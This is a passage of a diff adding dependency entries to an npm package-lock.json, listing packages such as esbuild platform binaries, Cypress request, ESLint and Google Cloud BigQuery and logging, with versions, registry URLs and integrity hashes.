|| ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/postcss-unset-value": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@csstools/postcss-unset-value/-/postcss-unset-value-2.0.1.tgz", + "integrity": "sha512-oJ9Xl29/yU8U7/pnMJRqAZd4YXNCfGEdcP4ywREuqm/xMqcgDNDppYRoCGDt40aaZQIEKBS79LytUDN/DHf0Ew==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/@csstools/selector-specificity": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/@csstools/selector-specificity/-/selector-specificity-2.2.0.tgz", + "integrity": "sha512-+OJ9konv95ClSTOJCmMZqpd5+YGsB2S+x6w3E1oaM8UuR5j8nTNHYSz8c9BEPGDOCMQYIEEGlVPj/VY64iTbGw==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + 
"peerDependencies": { + "postcss-selector-parser": "^6.0.10" + } + }, + "node_modules/@customerio/cdp-analytics-core": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/@customerio/cdp-analytics-core/-/cdp-analytics-core-0.3.0.tgz", + "integrity": "sha512-5BJ8VgUkLT2YuDZ7Dr+oWnpFNObF5tgfj1hU/E01+kxUAvzUoOiLNL6NjKy9AeZYIFuzqgzYCfmR/1mGYdngsw==", + "license": "MIT", + "dependencies": { + "@lukeed/uuid": "^2.0.0", + "dset": "^3.1.2", + "tslib": "^2.4.1" + } + }, + "node_modules/@customerio/cdp-analytics-node": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/@customerio/cdp-analytics-node/-/cdp-analytics-node-0.3.0.tgz", + "integrity": "sha512-p8WCtj+O3JoOooaFeENQzGPD8SDJ8x7z3P6s6xHtIaxsYjPFVfFVRV1avJQb3YTA+Z4Ak5h1oK/zayTIBJA6pQ==", + "dependencies": { + "@customerio/cdp-analytics-core": "0.3.0", + "@lukeed/uuid": "^2.0.0", + "buffer": "^6.0.3", + "node-fetch": "^2.6.7", + "tslib": "^2.4.1", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@customerio/cdp-analytics-node/node_modules/buffer": { + "version": "6.0.3", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-6.0.3.tgz", + "integrity": "sha512-FTiCpNxtwiZZHEZbcbTIcZjERVICn9yq/pDFkTl95/AxzD1naBctN7YO68riM/gLSDY7sdrMby8hofADYuuqOA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT", + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.2.1" + } + }, + "node_modules/@customerio/cdp-analytics-node/node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "BSD-3-Clause" + }, + "node_modules/@customerio/cdp-analytics-node/node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@cypress/request": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/@cypress/request/-/request-3.0.1.tgz", + "integrity": "sha512-TWivJlJi8ZDx2wGOw1dbLuHJKUYX7bWySw377nlnGOW3hP9/MUKIsEdXT/YngWxVdgNCHRBmFlBipE+5/2ZZlQ==", + "dev": true, + "dependencies": { + "aws-sign2": "~0.7.0", + "aws4": "^1.8.0", + "caseless": "~0.12.0", + "combined-stream": "~1.0.6", + "extend": "~3.0.2", + "forever-agent": "~0.6.1", + "form-data": "~2.3.2", + "http-signature": "~1.3.6", + "is-typedarray": "~1.0.0", + "isstream": "~0.1.2", + "json-stringify-safe": "~5.0.1", + "mime-types": "~2.1.19", + "performance-now": "^2.1.0", + "qs": "6.10.4", + "safe-buffer": "^5.1.2", + "tough-cookie": "^4.1.3", + "tunnel-agent": "^0.6.0", + "uuid": "^8.3.2" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/@cypress/request/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": 
"https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", + "dev": true, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/@cypress/request/node_modules/form-data": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", + "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", + "dev": true, + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.6", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 0.12" + } + }, + "node_modules/@cypress/request/node_modules/http-signature": { + "version": "1.3.6", + "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.3.6.tgz", + "integrity": "sha512-3adrsD6zqo4GsTqtO7FyrejHNv+NgiIfAfv68+jVlFmSr9OGy7zrxONceFRLKvnnZA5jbxQBX1u9PpB6Wi32Gw==", + "dev": true, + "dependencies": { + "assert-plus": "^1.0.0", + "jsprim": "^2.0.2", + "sshpk": "^1.14.1" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/@cypress/request/node_modules/jsprim": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-2.0.2.tgz", + "integrity": "sha512-gqXddjPqQ6G40VdnI6T6yObEC+pDNvyP95wdQhkWkg7crHH3km5qP1FsOXEkzEQwnz6gz5qGTn1c2Y52wP3OyQ==", + "dev": true, + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "assert-plus": "1.0.0", + "extsprintf": "1.3.0", + "json-schema": "0.4.0", + "verror": "1.10.0" + } + }, + "node_modules/@cypress/request/node_modules/qs": { + "version": "6.10.4", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.10.4.tgz", + "integrity": "sha512-OQiU+C+Ds5qiH91qh/mg0w+8nwQuLjM4F4M/PbmhDOoYehPh+Fb0bDjtR1sOvy7YKxvj28Y/M0PhP5uVX0kB+g==", + "dev": true, + "dependencies": { + "side-channel": "^1.0.4" + }, + "engines": { + "node": ">=0.6" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/@cypress/request/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "dev": true, + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@cypress/xvfb": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/@cypress/xvfb/-/xvfb-1.2.4.tgz", + "integrity": "sha512-skbBzPggOVYCbnGgV+0dmBdW/s77ZkAOXIC1knS8NagwDjBrNC1LuXtQJeiN6l+m7lzmHtaoUw/ctJKdqkG57Q==", + "dev": true, + "dependencies": { + "debug": "^3.1.0", + "lodash.once": "^4.1.1" + } + }, + "node_modules/@cypress/xvfb/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/@discoveryjs/json-ext": { + "version": "0.5.7", + "resolved": "https://registry.npmjs.org/@discoveryjs/json-ext/-/json-ext-0.5.7.tgz", + "integrity": "sha512-dBVuXR082gk3jsFp7Rd/JI4kytwGHecnCoTtXFb7DB6CNHp4rg5k1bhg0nWdLGLnOV71lmDzGQaLMy8iPLY0pw==", + "dev": true, + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/@dual-bundle/import-meta-resolve": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@dual-bundle/import-meta-resolve/-/import-meta-resolve-4.0.0.tgz", + "integrity": 
"sha512-ZKXyJeFAzcpKM2kk8ipoGIPUqx9BX52omTGnfwjJvxOCaZTM2wtDK7zN0aIgPRbT9XYAlha0HtmZ+XKteuh0Gw==", + "dev": true, + "peer": true, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/wooorm" + } + }, + "node_modules/@esbuild/aix-ppc64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.25.0.tgz", + "integrity": "sha512-O7vun9Sf8DFjH2UtqK8Ku3LkquL9SZL8OLY1T5NZkA34+wG3OQF7cl4Ql8vdNzM6fzBbYfLaiRLIOZ+2FOCgBQ==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "aix" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-arm": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.25.0.tgz", + "integrity": "sha512-PTyWCYYiU0+1eJKmw21lWtC+d08JDZPQ5g+kFyxP0V+es6VPPSUhM6zk8iImp2jbV6GwjX4pap0JFbUQN65X1g==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.25.0.tgz", + "integrity": "sha512-grvv8WncGjDSyUBjN9yHXNt+cq0snxXbDxy5pJtzMKGmmpPxeAmAhWxXI+01lU5rwZomDgD3kJwulEnhTRUd6g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/android-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.25.0.tgz", + "integrity": "sha512-m/ix7SfKG5buCnxasr52+LI78SQ+wgdENi9CqyCXwjVR2X4Jkz+BpC3le3AoBPYTC9NHklwngVXvbJ9/Akhrfg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/darwin-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.25.0.tgz", + "integrity": "sha512-mVwdUb5SRkPayVadIOI78K7aAnPamoeFR2bT5nszFUZ9P8UpK4ratOdYbZZXYSqPKMHfS1wdHCJk1P1EZpRdvw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/darwin-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.25.0.tgz", + "integrity": "sha512-DgDaYsPWFTS4S3nWpFcMn/33ZZwAAeAFKNHNa1QN0rI4pUjgqf0f7ONmXf6d22tqTY+H9FNdgeaAa+YIFUn2Rg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/freebsd-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.25.0.tgz", + "integrity": "sha512-VN4ocxy6dxefN1MepBx/iD1dH5K8qNtNe227I0mnTRjry8tj5MRk4zprLEdG8WPyAPb93/e4pSgi1SoHdgOa4w==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/freebsd-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.25.0.tgz", + "integrity": "sha512-mrSgt7lCh07FY+hDD1TxiTyIHyttn6vnjesnPoVDNmDfOmggTLXRv8Id5fNZey1gl/V2dyVK1VXXqVsQIiAk+A==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">=18" + } + }, + 
"node_modules/@esbuild/linux-arm": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.25.0.tgz", + "integrity": "sha512-vkB3IYj2IDo3g9xX7HqhPYxVkNQe8qTK55fraQyTzTX/fxaDtXiEnavv9geOsonh2Fd2RMB+i5cbhu2zMNWJwg==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.25.0.tgz", + "integrity": "sha512-9QAQjTWNDM/Vk2bgBl17yWuZxZNQIF0OUUuPZRKoDtqF2k4EtYbpyiG5/Dk7nqeK6kIJWPYldkOcBqjXjrUlmg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-ia32": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.25.0.tgz", + "integrity": "sha512-43ET5bHbphBegyeqLb7I1eYn2P/JYGNmzzdidq/w0T8E2SsYL1U6un2NFROFRg1JZLTzdCoRomg8Rvf9M6W6Gg==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-loong64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.25.0.tgz", + "integrity": "sha512-fC95c/xyNFueMhClxJmeRIj2yrSMdDfmqJnyOY4ZqsALkDrrKJfIg5NTMSzVBr5YW1jf+l7/cndBfP3MSDpoHw==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-mips64el": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.25.0.tgz", + "integrity": "sha512-nkAMFju7KDW73T1DdH7glcyIptm95a7Le8irTQNO/qtkoyypZAnjchQgooFUDQhNAy4iu08N79W4T4pMBwhPwQ==", + "cpu": [ + "mips64el" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-ppc64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.25.0.tgz", + "integrity": "sha512-NhyOejdhRGS8Iwv+KKR2zTq2PpysF9XqY+Zk77vQHqNbo/PwZCzB5/h7VGuREZm1fixhs4Q/qWRSi5zmAiO4Fw==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-riscv64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.25.0.tgz", + "integrity": "sha512-5S/rbP5OY+GHLC5qXp1y/Mx//e92L1YDqkiBbO9TQOvuFXM+iDqUNG5XopAnXoRH3FjIUDkeGcY1cgNvnXp/kA==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-s390x": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.25.0.tgz", + "integrity": "sha512-XM2BFsEBz0Fw37V0zU4CXfcfuACMrppsMFKdYY2WuTS3yi8O1nFOhil/xhKTmE1nPmVyvQJjJivgDT+xh8pXJA==", + "cpu": [ + "s390x" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/linux-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.25.0.tgz", + "integrity": 
"sha512-9yl91rHw/cpwMCNytUDxwj2XjFpxML0y9HAOH9pNVQDpQrBxHy01Dx+vaMu0N1CKa/RzBD2hB4u//nfc+Sd3Cw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/netbsd-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.25.0.tgz", + "integrity": "sha512-RuG4PSMPFfrkH6UwCAqBzauBWTygTvb1nxWasEJooGSJ/NwRw7b2HOwyRTQIU97Hq37l3npXoZGYMy3b3xYvPw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/netbsd-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.25.0.tgz", + "integrity": "sha512-jl+qisSB5jk01N5f7sPCsBENCOlPiS/xptD5yxOx2oqQfyourJwIKLRA2yqWdifj3owQZCL2sn6o08dBzZGQzA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "netbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/openbsd-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.25.0.tgz", + "integrity": "sha512-21sUNbq2r84YE+SJDfaQRvdgznTD8Xc0oc3p3iW/a1EVWeNj/SdUCbm5U0itZPQYRuRTW20fPMWMpcrciH2EJw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/openbsd-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.25.0.tgz", + "integrity": "sha512-2gwwriSMPcCFRlPlKx3zLQhfN/2WjJ2NSlg5TKLQOJdV0mSxIcYNTMhk3H3ulL/cak+Xj0lY1Ym9ysDV1igceg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/sunos-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.25.0.tgz", + "integrity": "sha512-bxI7ThgLzPrPz484/S9jLlvUAHYMzy6I0XiU1ZMeAEOBcS0VePBFxh1JjTQt3Xiat5b6Oh4x7UC7IwKQKIJRIg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "sunos" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-arm64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.25.0.tgz", + "integrity": "sha512-ZUAc2YK6JW89xTbXvftxdnYy3m4iHIkDtK3CLce8wg8M2L+YZhIvO1DKpxrd0Yr59AeNNkTiic9YLf6FTtXWMw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-ia32": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.25.0.tgz", + "integrity": "sha512-eSNxISBu8XweVEWG31/JzjkIGbGIJN/TrRoiSVZwZ6pkC6VX4Im/WV2cz559/TXLcYbcrDN8JtKgd9DJVIo8GA==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + "node_modules/@esbuild/win32-x64": { + "version": "0.25.0", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.25.0.tgz", + "integrity": "sha512-ZENoHJBxA20C2zFzh6AI4fT6RraMzjYw4xKWemRTRmRVtN9c5DcH9r/f2ihEkMjOW5eGgrwCslG/+Y/3bL+DHQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">=18" + } + }, + 
"node_modules/@eslint-community/eslint-utils": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/@eslint-community/eslint-utils/-/eslint-utils-4.4.0.tgz", + "integrity": "sha512-1/sA4dwrzBAyeUoQ6oxahHKmrZvsnLCg4RfxW3ZFGGmQkSNQPFNLV9CUEFQP1x9EYXHTo5p6xdhZM1Ne9p/AfA==", + "dependencies": { + "eslint-visitor-keys": "^3.3.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "peerDependencies": { + "eslint": "^6.0.0 || ^7.0.0 || >=8.0.0" + } + }, + "node_modules/@eslint-community/eslint-utils/node_modules/eslint-visitor-keys": { + "version": "3.4.1", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.1.tgz", + "integrity": "sha512-pZnmmLwYzf+kWaM/Qgrvpen51upAktaaiI01nsJD/Yr3lMOdNtq0cxkrrg16w64VtisN6okbs7Q8AfGqj4c9fA==", + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@eslint-community/regexpp": { + "version": "4.10.0", + "resolved": "https://registry.npmjs.org/@eslint-community/regexpp/-/regexpp-4.10.0.tgz", + "integrity": "sha512-Cu96Sd2By9mCNTx2iyKOmq10v22jUVQv0lQnlGNy16oE9589yE+QADPbrMGCkA51cKZSg3Pu/aTJVTGfL/qjUA==", + "engines": { + "node": "^12.0.0 || ^14.0.0 || >=16.0.0" + } + }, + "node_modules/@eslint/eslintrc": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-2.1.4.tgz", + "integrity": "sha512-269Z39MS6wVJtsoUl10L60WdkhJVdPG24Q4eZTH3nnF6lpvSShEK3wQjDX9JRWAUPvPh7COouPpU9IrqaZFvtQ==", + "dependencies": { + "ajv": "^6.12.4", + "debug": "^4.3.2", + "espree": "^9.6.0", + "globals": "^13.19.0", + "ignore": "^5.2.0", + "import-fresh": "^3.2.1", + "js-yaml": "^4.1.0", + "minimatch": "^3.1.2", + "strip-json-comments": "^3.1.1" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@eslint/eslintrc/node_modules/globals": { + "version": "13.24.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-13.24.0.tgz", + "integrity": "sha512-AhO5QUcj8llrbG09iWhPU2B204J1xnPeL8kQmVorSsy+Sjj1sk8gIyh6cUocGmH4L0UuhAJy+hJMRA4mgA4mFQ==", + "dependencies": { + "type-fest": "^0.20.2" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@eslint/js": { + "version": "8.57.0", + "resolved": "https://registry.npmjs.org/@eslint/js/-/js-8.57.0.tgz", + "integrity": "sha512-Ys+3g2TaW7gADOJzPt83SJtCDhMjndcDMFVQ/Tj9iA1BfJzFKD9mAUXT3OenpuPHbI6P/myECxRJrofUsDx/5g==", + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + } + }, + "node_modules/@google-cloud/bigquery": { + "version": "5.10.0", + "resolved": "https://registry.npmjs.org/@google-cloud/bigquery/-/bigquery-5.10.0.tgz", + "integrity": "sha512-kHwPT3O5pihjlhZ4wpNElovv/RY2hyz5MdgON1UlwFM9bVA8kXqdUWS09owjVhHKaHqBxliUpG0DAwjrKHqY7Q==", + "dependencies": { + "@google-cloud/common": "^3.1.0", + "@google-cloud/paginator": "^3.0.0", + "@google-cloud/promisify": "^2.0.0", + "arrify": "^2.0.1", + "big.js": "^6.0.0", + "duplexify": "^4.0.0", + "extend": "^3.0.2", + "is": "^3.3.0", + "p-event": "^4.1.0", + "stream-events": "^1.0.5", + "uuid": "^8.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/bigquery/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": 
"sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/@google-cloud/bigquery/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/@google-cloud/common": { + "version": "3.9.0", + "resolved": "https://registry.npmjs.org/@google-cloud/common/-/common-3.9.0.tgz", + "integrity": "sha512-R9PfmCKbpOizvcLY+fz/TS4HdOQhvmf4EY4xEXvWnotGbGXujuTLJTJ2URy8BGT8TDxlh6gjjfEwjJ8McnNPIg==", + "dependencies": { + "@google-cloud/projectify": "^2.0.0", + "@google-cloud/promisify": "^2.0.0", + "arrify": "^2.0.1", + "duplexify": "^4.1.1", + "ent": "^2.2.0", + "extend": "^3.0.2", + "google-auth-library": "^7.9.2", + "retry-request": "^4.2.2", + "teeny-request": "^7.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@google-cloud/common/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + "dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/@google-cloud/logging": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/@google-cloud/logging/-/logging-11.1.0.tgz", + "integrity": "sha512-S3Zsd+HZxIdZgDZByJ+2GaSQ8rA5OLfdZoZ9Ys1iSZ4HRIhO9ZxlXbmGZgGK9JJ2GaXp7Rux4K4LpkqoYPKnEg==", + "dependencies": { + "@google-cloud/common": "^5.0.0", + "@google-cloud/paginator": "^5.0.0", + "@google-cloud/projectify": "^4.0.0", + "@google-cloud/promisify": "^4.0.0", + "arrify": "^2.0.1", + "dot-prop": "^6.0.0", + "eventid": "^2.0.0", + "extend": "^3.0.2", + "gcp-metadata": "^6.0.0", + "google-auth-library": "^9.0.0", + "google-gax": "^4.0.3", + "on-finished": "^2.3.0", + "pumpify": "^2.0.1", + "stream-events": "^1.0.5", + "uuid": "^9.0.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@google-cloud/logging-bunyan": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/@google-cloud/logging-bunyan/-/logging-bunyan-5.1.0.tgz", + "integrity": "sha512-D2Rg5nb+onjWre4eEowWyNmVF1RN7WThWdu1cCOcTMVOoVEGJphMxrBo9VQKQmkqdlAUG4NaM6i2sqieISQDsg==", + "dependencies": { + "@google-cloud/logging": "^11.0.0", + "google-auth-library": "^9.0.0" + }, + "engines": { + "node": 